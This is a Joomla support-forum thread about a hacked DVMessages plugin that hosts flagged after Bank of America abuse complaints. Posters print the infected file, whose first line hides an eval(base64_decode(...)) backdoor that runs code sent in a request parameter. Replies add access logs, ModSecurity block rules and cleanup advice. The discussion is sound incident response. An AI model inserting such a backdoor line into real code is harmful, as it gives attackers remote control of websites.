dvmessages.php is being reported as phishing file?
-
- Joomla! Fledgling
- Posts: 4
- Joined: Sun Jan 20, 2013 2:45 pm
dvmessages.php is being reported as phishing file?
Is dvmessages.php a valid joomla file? My host is claiming abuse notices from Bank of America and we have double checked everything and have not found any updated files...
We did notice that the joomla error logs are not being populate as of recently...not sure how to get that going again but the path in site config seems find
We did find a few of the following in the raw logs...
184.173.241.57 - - [20/Feb/2013:15:07:23 +0000] "POST /plugins/system/dvmessages/dvmessages.php?action=status HTTP/1.0" 200 12 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
We currently using Akeeba admin to turn off site temporarily
so if you can tell us how to get loggin back on and what else i should check...
thanks
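As an added example (not code from the original post or from the DVMessages project), here is a small Python script that runs the check the poster is asking about over raw access-log lines: it parses each line in the common/combined log format, flags requests to dvmessages.php under either path form that appears in this thread (inside its plugin folder, or directly under plugins/system), and tallies them by source IP and query string. The first sample line is the one quoted above; the other lines are constructed for the example.

```python
import re
from collections import Counter

# Common/combined log format, as in the raw log excerpt quoted in the post.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Both path forms mentioned in this thread: the plugin file inside its own
# folder (as in the quoted log line) and the file directly under plugins/system.
SUSPECT_PATH_RE = re.compile(r'/plugins/system/(?:dvmessages/)?dvmessages\.php')

# Sample input: line 1 is the real excerpt from the post above; the rest are constructed.
SAMPLE_LOG = [
    '184.173.241.57 - - [20/Feb/2013:15:07:23 +0000] "POST /plugins/system/dvmessages/dvmessages.php?action=status HTTP/1.0" 200 12 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"',
    # constructed: ordinary page view, must not be flagged
    '198.51.100.7 - - [20/Feb/2013:15:08:01 +0000] "GET /index.php?option=com_content&view=article&id=5 HTTP/1.1" 200 8431 "-" "Mozilla/5.0"',
    # constructed: the other path form referenced later in the thread, no query string
    '203.0.113.9 - - [20/Feb/2013:15:09:44 +0000] "POST /plugins/system/dvmessages.php HTTP/1.0" 200 0 "-" "Mozilla/4.0"',
    # constructed: a repeat from the first source address
    '184.173.241.57 - - [20/Feb/2013:15:10:02 +0000] "POST /plugins/system/dvmessages/dvmessages.php?action=status HTTP/1.0" 200 12 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"',
    # constructed: a truncated line that does not parse and is skipped
    'garbage line',
]


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it is not in the expected format."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def find_dvmessages_hits(lines):
    """Return one record per request whose path is dvmessages.php (either path form)."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        path, _, query = rec['path'].partition('?')
        if SUSPECT_PATH_RE.fullmatch(path):
            hits.append({
                'ip': rec['ip'], 'ts': rec['ts'], 'method': rec['method'],
                'path': path, 'query': query, 'status': int(rec['status']),
                'ua': rec['ua'],
            })
    return hits


def summarize(hits):
    """Count hits per source IP and per query string, to size the cleanup and blocking job."""
    by_ip = Counter(h['ip'] for h in hits)
    by_query = Counter(h['query'] for h in hits)
    return by_ip, by_query


def scan_log_file(path):
    """Run the detector over a real access log (e.g. the raw logs from the hosting panel)."""
    with open(path, encoding='utf-8', errors='replace') as fh:
        return find_dvmessages_hits(fh)


if __name__ == '__main__':
    found = find_dvmessages_hits(SAMPLE_LOG)
    for h in found:
        print(f"{h['ts']} {h['ip']} {h['method']} {h['path']} query={h['query']!r} status={h['status']}")
    per_ip, per_query = summarize(found)
    print('requests per source IP:', dict(per_ip))
    print('query strings seen:', dict(per_query))
```

A 200 response with a small body to a POST against a plugin file that Joomla itself never requests directly is the thing to look for; a site that is clean should show no such requests at all. The per-IP tally is what you would hand to the host, or feed into a firewall block list, once the file itself has been removed.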
-
- Joomla! Fledgling
- Posts: 4
- Joined: Sat Feb 23, 2013 9:47 am
Re: dvmessages.php is being reported as phishing file?
I have sort of the same question. The server that we have contract with, send us an email.
It claims that 'dvmessages.php' in 'plugins/system/dvmessages.php' path is a malware. Do you have any experience about this?
I 'm looking forward to your answers.
Regards,
- mandville
- Joomla! Master
- Posts: 15152
- Joined: Mon Mar 20, 2006 1:56 am
- Location: The Girly Side of Joomla in Sussex
Re: dvmessages.php is being reported as phishing file?
is this an extension plugin for http://extensions.joomla.org/extensions ... ames/10999
what are the contents of the file
as for your logging issues, try and delete the current log file and see if that will restart it. check the logging settings with your host
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}
- pera
- Joomla! Apprentice
- Posts: 37
- Joined: Wed Aug 24, 2005 5:31 pm
- Location: Sweden
- Contact:
Re: dvmessages.php is being reported as phishing file?
This is the second time I get a notice from
Abuse Team
Bank of America
The code of the file is:
Code:
<?php
defined( '_JEXEC' ) or die(@eval(base64_decode($_REQUEST['c_id']))); // injected line: runs whatever base64-encoded PHP arrives in the c_id request parameter
jimport( 'joomla.plugin.plugin' );
jimport( 'joomla.application.component.helper' );
class plgSystemDVMessages extends JPlugin
{
    var $message;

    function plgSystemDVMessages(& $subject, $config) {
        parent::__construct($subject, $config);
    }

    function onAfterInitialise()
    {
        global $_PROFILER, $mainframe, $database, $_SESSION;
        $plugin =& JPluginHelper::getPlugin('system', 'dvmessages');
        $pluginParams = new JParameter( $plugin->params );
        $document = &JFactory::getDocument();
        $temps = $mainframe->getMessageQueue();
        if ($temps) {
            foreach($temps as $temp) {
                if ($temp['message'] != '') {
                    $messages = $temp;
                }
            }
        }
        if ($messages) {
            if($mainframe->isSite() && ($pluginParams->get('front_enable', 1)) ||
               !$mainframe->isSite() && ($pluginParams->get('admin_enable', 1))) {
                $type = '';
                if (($messages['type'] == 'notice') && ($pluginParams->get('show_notice', 1))) {
                    $type = 'info';
                } elseif (($messages['type'] == 'warning') && ($pluginParams->get('show_warning', 1))) {
                    $type = 'alert';
                } elseif (($messages['type'] == 'error') && ($pluginParams->get('show_error', 1))) {
                    $type = 'error';
                } elseif (($messages['type'] == 'message') && ($pluginParams->get('show_message', 1))) {
                    $type = 'info';
                }
                if ($type != '') {
                    JHTML::_('behavior.mootools');
                    $document->addScript(JURI::Root() . 'plugins/system/SEO/jquery.min.js');
                    $document->addScript(JURI::Root() . 'plugins/system/SEO/jquery.easing.1.3.js');
                    $document->addScript(JURI::Root() . 'plugins/system/SEO/SEObox.v1.2.jquery.js');
                    $document->addStyleSheet(JURI::Root() . 'plugins/system/SEO/SEObox.css');
                    $document->addScriptDeclaration("
                        jQuery.noConflict();
                        jQuery(document).ready(function(){
                            Sexy.$type('".addslashes($messages['message'])."');
                        });
                    ");
                    if ($pluginParams->get('hide_css', 1)) {
                        $document->addScriptDeclaration("
                            jQuery.noConflict();
                            jQuery(document).ready(function(){
                                document.getElementById('system-message').style.display = 'none';
                            });
                        ");
                    }
                }
            }
        }
        return true;
    }
}
The abuse team advised me to check with:
curl -A "Mozilla/4.0" -iL [URL]
I get
Code:
[root@srv5 dvmessages]# curl -A "Mozilla/4.0" -iL http://www.xxx/plugins/system/dvmessages/dvmessages.php
HTTP/1.1 200 OK
Date: Tue, 26 Feb 2013 14:18:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.3.20
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/html
Any advice?
Pera
http://winstart.com
-
- Joomla! Fledgling
- Posts: 1
- Joined: Tue Feb 26, 2013 6:37 pm
- Location: London, UK
Re: dvmessages.php is being reported as phishing file?
Hello,
Oh so I`m not the only one having this problem then
I got a message today from my host stating there is a suspicious code in ../plugins/system/dvmessages/dvmessages.php, and may result malicious activity. Can not recall installing mentioned extension. Is it possible it came with anything else?
Now when I`m checking plugins folder there is no sign of dvmessages. How weird?
- ionut
- Joomla! Ace
- Posts: 1264
- Joined: Thu May 27, 2010 1:00 pm
- Location: EU
Re: dvmessages.php is being reported as phishing file?
@pera the first line for sure doesn't look nice.
Code:
defined( '_JEXEC' ) or die(@eval(base64_decode($_REQUEST['c_id'])));
-
- Joomla! Fledgling
- Posts: 1
- Joined: Tue Feb 26, 2013 10:25 pm
Re: dvmessages.php is being reported as phishing file?
My hosting provider just sent me a similar warning. Is it a cyber attack? I see nothing strange in the code ... Please, can anyone tell me where the attack is?
- pera
- Joomla! Apprentice
- Posts: 37
- Joined: Wed Aug 24, 2005 5:31 pm
- Location: Sweden
- Contact:
Re: dvmessages.php is being reported as phishing file?
The original file from
http://extensions.joomla.org/extensions ... ames/10999
dvmessages.php
Code:
<?php
/**
 */
// no direct access
defined( '_JEXEC' ) or die( 'Restricted access' );
jimport( 'joomla.plugin.plugin' );
But on the "infected" dvmessages.php
Code:
<?php
defined( '_JEXEC' ) or die(@eval(base64_decode($_REQUEST['c_id'])));
jimport( 'joomla.plugin.plugin' );
This old plugin is for Joomla 1.5... best is to not use it, or?
Pera
http://winstart.com
- PhilD
- Joomla! Hero
- Posts: 2737
- Joined: Sat Oct 21, 2006 10:20 pm
- Location: Wisconsin USA
- Contact:
Re: dvmessages.php is being reported as phishing file?
Well obviously (based on posted code) the code is now part of a larger hack with likely more files installed somewhere on the site.
My advice is to disable, and completely remove all traces of the plugin, and also you (everyone jumping on with a me too) are going to have to follow the advice and procedures here: http://forum.joomla.org/viewtopic.php?f=621&t=582854 in order to properly remove the hack and clean the site(s).
I would NOT install or use the plugin after you have cleaned the site. It may or may not be the source of the site's insecurity, but until you know for sure, don't use it.
PhilD
-
- Joomla! Fledgling
- Posts: 1
- Joined: Fri Mar 08, 2013 2:43 am
Re: dvmessages.php is being reported as phishing file?
This is definitely part of a larger effort. This is a very dangerous hack that is much, much larger than Bank of America and all administrators should remove this plugin and follow the instructions from PhilD above. Additionally, if you administrate your own server (i.e. a VPS, dedicated server), then you should also secure your temp directory (and also your Joomla temp directory, if different from your system temp). Below is an example on how you might be able to do that.
http://www.techrepublic.com/blog/openso ... -linux/171
-
- Joomla! Fledgling
- Posts: 1
- Joined: Thu Mar 21, 2013 12:27 pm
Re: dvmessages.php is being reported as phishing file?
your server is now part of a botnet if you have this file (or others)
http://www.prolexic.com/news-events-pr-threat-advisory-ddos-itsoknoproblembro.html
itsokbronoproblem botnet uses these files ...
If you have these files on your Joomla (or WordPress) then your installation has been compromised by the automated attack tools the botnet uses, this would mean you have old versions of Joomla or WordPress installed.
You need to update Joomla / WordPress to the most recent versions, remove any components / plugins that are not being used, then audit all files uploaded to your hosting account for malicious changes / compromised back doors.
-
- Joomla! Apprentice
- Posts: 10
- Joined: Thu May 20, 2010 12:52 am
Re: dvmessages.php is being reported as phishing file?
This botnet has been firing up again the last couple days. Tons of joomla sites are being used to DDoS Bank of America.
According to access logs on affected servers, it looks like the malicious dvmessages.php files are being edited/uploaded using com_installer. If you have an infected dvmessages file that contains the bad eval statement, fix it:
Code:
change
defined( '_JEXEC' ) or die(@eval(base64_decode($_REQUEST['c_id'])));
to
defined( '_JEXEC' ) or die( 'Restricted access' );
The infection itself means that either your joomla install is outdated and vulnerable (J1.5) or your administrator password was compromised. Upgrade your software and change your (super)Administrator password(s).
-
- Joomla! Intern
- Posts: 80
- Joined: Fri Jul 20, 2007 2:57 pm
- Location: Pattaya & Surin/Thailand
Re: dvmessages.php is being reported as phishing file?
skate323k137 wrote:
This botnet has been firing up again the last couple days. Tons of joomla sites are being used to DDoS Bank of America.
According to access logs on affected servers, it looks like the malicious dvmessages.php files are being edited/uploaded using com_installer. If you have an infected dvmessages file that contains the bad eval statement, fix it:
The infection itself means that either your joomla install is outdated and vulnerable (J1.5) or your administrator password was compromised. Upgrade your software and change your (super)Administrator password(s).
Code:
change defined( '_JEXEC' ) or die(@eval(base64_decode($_REQUEST['c_id']))); to defined( '_JEXEC' ) or die( 'Restricted access' );
So, we're all in the same boat ... Three of my sites have been attacked and my host company sent me several complaints from Bank of America. Also on my sites plugins/system/dvmessages.php was mentioned every time. I have now changed the parameters of all three files, but I don't think this will change much. My joomla install is marked as updated, except on one site where I have to update manually.
Sorry to ask: "Upgrade your software" >> which software, please?
This is what my dvmessages.php file contains now:
Code:
params );
$document = &JFactory::getDocument();
$temps = $mainframe->getMessageQueue();
if ($temps) {
    foreach($temps as $temp) {
        if ($temp['message'] != '') {
            $messages = $temp;
        }
    }
}
if ($messages) {
    if($mainframe->isSite() && ($pluginParams->get('front_enable', 1)) ||
       !$mainframe->isSite() && ($pluginParams->get('admin_enable', 1))) {
        $type = '';
        if (($messages['type'] == 'notice') && ($pluginParams->get('show_notice', 1))) {
            $type = 'info';
        } elseif (($messages['type'] == 'warning') && ($pluginParams->get('show_warning', 1))) {
            $type = 'alert';
        } elseif (($messages['type'] == 'error') && ($pluginParams->get('show_error', 1))) {
            $type = 'error';
        } elseif (($messages['type'] == 'message') && ($pluginParams->get('show_message', 1))) {
            $type = 'info';
        }
        if ($type != '') {
            JHTML::_('behavior.mootools');
            $document->addScript(JURI::Root() . 'plugins/system/SEO/jquery.min.js');
            $document->addScript(JURI::Root() . 'plugins/system/SEO/jquery.easing.1.3.js');
            $document->addScript(JURI::Root() . 'plugins/system/SEO/SEObox.v1.2.jquery.js');
            $document->addStyleSheet(JURI::Root() . 'plugins/system/SEO/SEObox.css');
            $document->addScriptDeclaration("
                jQuery.noConflict();
                jQuery(document).ready(function(){
                    Sexy.$type('".addslashes($messages['message'])."');
                });
            ");
            if ($pluginParams->get('hide_css', 1)) {
                $document->addScriptDeclaration("
                    jQuery.noConflict();
                    jQuery(document).ready(function(){
                        document.getElementById('system-message').style.display = 'none';
                    });
                ");
            }
        }
    }
}
return true;
}
}
Last edited by Sampao on Thu Mar 28, 2013 5:24 pm, edited 1 time in total.
-
- Joomla! Apprentice
- Posts: 10
- Joined: Thu May 20, 2010 12:52 am
Re: dvmessages.php is being reported as phishing file?
The only one of these I tracked down in domlogs tracked to com_installer. That should have been patched a long time ago. Are you in a shared hosting environment like on a cPanel server with other customers? If so you should ask your host if they've applied a patch to prevent cross-account symbolic links.
If you have root access you should install configserver firewall and mod_security. Configserver firewall will block IPs that trip mod_security more than five times. If you make a modsec rule that denies the URI, the bots trying to hit it will be banned. Sometimes after you clean the file the bots still try to access it for days causing high server load. Put this in modsec2.user.conf or one of your first includes files referenced in that file:
Code:
SecRule REQUEST_URI "/plugins/system/dvmessages.php" "chain,id:1234942,msg:dvmessages"
SecRule SERVER_NAME "domain.com"
Change domain.com to the site being attacked. If it affects several sites just make it a one-line rule:
Code:
SecRule REQUEST_URI "/plugins/system/dvmessages.php" "id:1234943,msg:dvmessages"
-
- Joomla! Intern
- Posts: 80
- Joined: Fri Jul 20, 2007 2:57 pm
- Location: Pattaya & Surin/Thailand
Re: dvmessages.php is being reported as phishing file?
to skate323k137:
was that last message for me? If yes, I can't follow your instructions, honestly.
-
- Joomla! Apprentice
- Posts: 10
- Joined: Thu May 20, 2010 12:52 am
Re: dvmessages.php is being reported as phishing file?
It was, though it will help anyone in this situation if they are on a linux server. Are you hosted on a shared server, or do you have root access to your hosting environment (i.e. VPS or Dedicated server?)
-
- Joomla! Fledgling
- Posts: 2
- Joined: Mon Apr 01, 2013 7:03 am
Re: dvmessages.php is being reported as phishing file?
The original file from
http://extensions.joomla.org/extensions ... ames/10999
dvmessages.php
what does smh mean
- PseudZ
- Joomla! Apprentice
- Posts: 35
- Joined: Thu Jul 07, 2011 11:58 am
- Location: South Africa
Re: dvmessages.php is being reported as phishing file?
What extension has been infected and should be removed? It seems to have been removed from the extensions directory and I cannot see which one it is.
Thanks
- horus_68
- Joomla! Ace
- Posts: 1495
- Joined: Sun Sep 25, 2005 5:29 am
- Location: Porto - Portugal
Re: dvmessages.php is being reported as phishing file?
PseudZ wrote:
What extension has been infected and should be removed? It seems to have been removed from the extensions directory and I cannot see which one it is.
Thanks
The extension reported here is DVMessages - http://archive.extensions.joomla.org/ex ... ames/10999
Portuguese Joomla Community / Joomla pt-PT Translation Team